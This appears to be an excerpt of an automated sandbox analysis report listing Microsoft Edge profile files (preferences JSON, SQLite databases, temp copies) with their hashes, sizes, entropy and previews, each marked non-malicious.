                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                  Entropy (8bit):1.113946543866108
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBnj:JkIEumQv8m1ccnvS6nJ0cI9Fj1a
                                                                                                                                                                                                                                                                  MD5:1AE6EE459A42E16A10E9FED62755F1F1
                                                                                                                                                                                                                                                                  SHA1:003F532DB0087423430550F91F0088A6D322DF23
                                                                                                                                                                                                                                                                  SHA-256:28A94422D497263E6CC428EF6D2A7745E2650764D916392A9FFA645C54C3C273
                                                                                                                                                                                                                                                                  SHA-512:58A8DDB63F05CD2B8E06E678A55D269ADC440F7B41EE42C8E4886F74F03C1571E409C33FD13BBD6FF0AC24B4504FB049D9E00CB3A688C600F4ED96099424D420
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF39d79.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3bbcf.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f50fda56-4491-4e61-978f-00eda3011a1b.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                  MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                  SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                  SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                  SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                  MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                  SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                  SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                  SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                                                                                  Entropy (8bit):0.8016178291957933
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:LBtiuWkKcwF11DM/FAf4AEoO7L0rqq9HzORh:LLiuW9LFPY/Wf4Axo0rqqBzO
                                                                                                                                                                                                                                                                  MD5:3E82691615718EE3453F1F4623885841
                                                                                                                                                                                                                                                                  SHA1:B7928F7EA242985C1B825BE4A6D354DA66EA4C2A
                                                                                                                                                                                                                                                                  SHA-256:149A26BC6A5B0B20A82151143574F31CEA39C3CA5A005FFC4A856C953771967C
                                                                                                                                                                                                                                                                  SHA-512:34BE810195BB987E5F221E8D7344B3358E82BC589375A1C289E1DDC3D219098B36A3964A98FAEBB0ADAF86BD246F724B233AB1C63F8418DD65DEFB474E4FAF20
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9378
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087202625297569
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stRSns3AkaFvrEmkiOb3n88bV+FiA3UiPsYJ:stR+s3AkCD9SbGi3O
                                                                                                                                                                                                                                                                  MD5:689A0BA1F5EAF4035EC7FDDB659AFDBC
                                                                                                                                                                                                                                                                  SHA1:9597255F9F40D11B32C6A3C2823C51279EA026A4
                                                                                                                                                                                                                                                                  SHA-256:21EA47B7E58059125ECDCC2D09109A02B58A77B9E45056C626F04A9FB410DEF5
                                                                                                                                                                                                                                                                  SHA-512:333AB9D538CC5A83D8F1E82992B052F9569CFE736D44C2C11BB44FBB410B9320AE97A95DFD9FBE581FA7AE70360347890849FD130AE08862342B433821D07529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3de5b.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9378
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087202625297569
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stRSns3AkaFvrEmkiOb3n88bV+FiA3UiPsYJ:stR+s3AkCD9SbGi3O
                                                                                                                                                                                                                                                                  MD5:689A0BA1F5EAF4035EC7FDDB659AFDBC
                                                                                                                                                                                                                                                                  SHA1:9597255F9F40D11B32C6A3C2823C51279EA026A4
                                                                                                                                                                                                                                                                  SHA-256:21EA47B7E58059125ECDCC2D09109A02B58A77B9E45056C626F04A9FB410DEF5
                                                                                                                                                                                                                                                                  SHA-512:333AB9D538CC5A83D8F1E82992B052F9569CFE736D44C2C11BB44FBB410B9320AE97A95DFD9FBE581FA7AE70360347890849FD130AE08862342B433821D07529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF42c2d.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9378
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087202625297569
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stRSns3AkaFvrEmkiOb3n88bV+FiA3UiPsYJ:stR+s3AkCD9SbGi3O
                                                                                                                                                                                                                                                                  MD5:689A0BA1F5EAF4035EC7FDDB659AFDBC
                                                                                                                                                                                                                                                                  SHA1:9597255F9F40D11B32C6A3C2823C51279EA026A4
                                                                                                                                                                                                                                                                  SHA-256:21EA47B7E58059125ECDCC2D09109A02B58A77B9E45056C626F04A9FB410DEF5
                                                                                                                                                                                                                                                                  SHA-512:333AB9D538CC5A83D8F1E82992B052F9569CFE736D44C2C11BB44FBB410B9320AE97A95DFD9FBE581FA7AE70360347890849FD130AE08862342B433821D07529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4a19b.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9378
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087202625297569
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stRSns3AkaFvrEmkiOb3n88bV+FiA3UiPsYJ:stR+s3AkCD9SbGi3O
                                                                                                                                                                                                                                                                  MD5:689A0BA1F5EAF4035EC7FDDB659AFDBC
                                                                                                                                                                                                                                                                  SHA1:9597255F9F40D11B32C6A3C2823C51279EA026A4
                                                                                                                                                                                                                                                                  SHA-256:21EA47B7E58059125ECDCC2D09109A02B58A77B9E45056C626F04A9FB410DEF5
                                                                                                                                                                                                                                                                  SHA-512:333AB9D538CC5A83D8F1E82992B052F9569CFE736D44C2C11BB44FBB410B9320AE97A95DFD9FBE581FA7AE70360347890849FD130AE08862342B433821D07529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                  Entropy (8bit):5.567558347504769
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDrbiVWLnW5wwyf44/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPWiIfM9XrwXopBtuJ:f32VanWawyfR/u1jaznYE+ty
                                                                                                                                                                                                                                                                  MD5:5E52B79374A0866B50456D205B21AE86
                                                                                                                                                                                                                                                                  SHA1:EB0497DEE1901F47A3A7BC049EE4A6C0243CDA79
                                                                                                                                                                                                                                                                  SHA-256:BC359FA6DEB52AA083F857B7B8E658FF8074147FEC6BFD599FDB5159CB97D4F8
                                                                                                                                                                                                                                                                  SHA-512:089A8C27CFE43E9A63B2B7998BF9B9408476198218CADDF5D3BC4F31FC84530DB7F511ADA96B91004C21DF7B15ACB6A917B6B659EBAD4F9AE7972E251F4B9EB5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3e2df.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                  Entropy (8bit):5.567558347504769
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDrbiVWLnW5wwyf44/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPWiIfM9XrwXopBtuJ:f32VanWawyfR/u1jaznYE+ty
                                                                                                                                                                                                                                                                  MD5:5E52B79374A0866B50456D205B21AE86
                                                                                                                                                                                                                                                                  SHA1:EB0497DEE1901F47A3A7BC049EE4A6C0243CDA79
                                                                                                                                                                                                                                                                  SHA-256:BC359FA6DEB52AA083F857B7B8E658FF8074147FEC6BFD599FDB5159CB97D4F8
                                                                                                                                                                                                                                                                  SHA-512:089A8C27CFE43E9A63B2B7998BF9B9408476198218CADDF5D3BC4F31FC84530DB7F511ADA96B91004C21DF7B15ACB6A917B6B659EBAD4F9AE7972E251F4B9EB5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF421ec.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                  Entropy (8bit):5.567558347504769
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDrbiVWLnW5wwyf44/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPWiIfM9XrwXopBtuJ:f32VanWawyfR/u1jaznYE+ty
                                                                                                                                                                                                                                                                  MD5:5E52B79374A0866B50456D205B21AE86
                                                                                                                                                                                                                                                                  SHA1:EB0497DEE1901F47A3A7BC049EE4A6C0243CDA79
                                                                                                                                                                                                                                                                  SHA-256:BC359FA6DEB52AA083F857B7B8E658FF8074147FEC6BFD599FDB5159CB97D4F8
                                                                                                                                                                                                                                                                  SHA-512:089A8C27CFE43E9A63B2B7998BF9B9408476198218CADDF5D3BC4F31FC84530DB7F511ADA96B91004C21DF7B15ACB6A917B6B659EBAD4F9AE7972E251F4B9EB5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):213
                                                                                                                                                                                                                                                                  Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                  MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                  SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
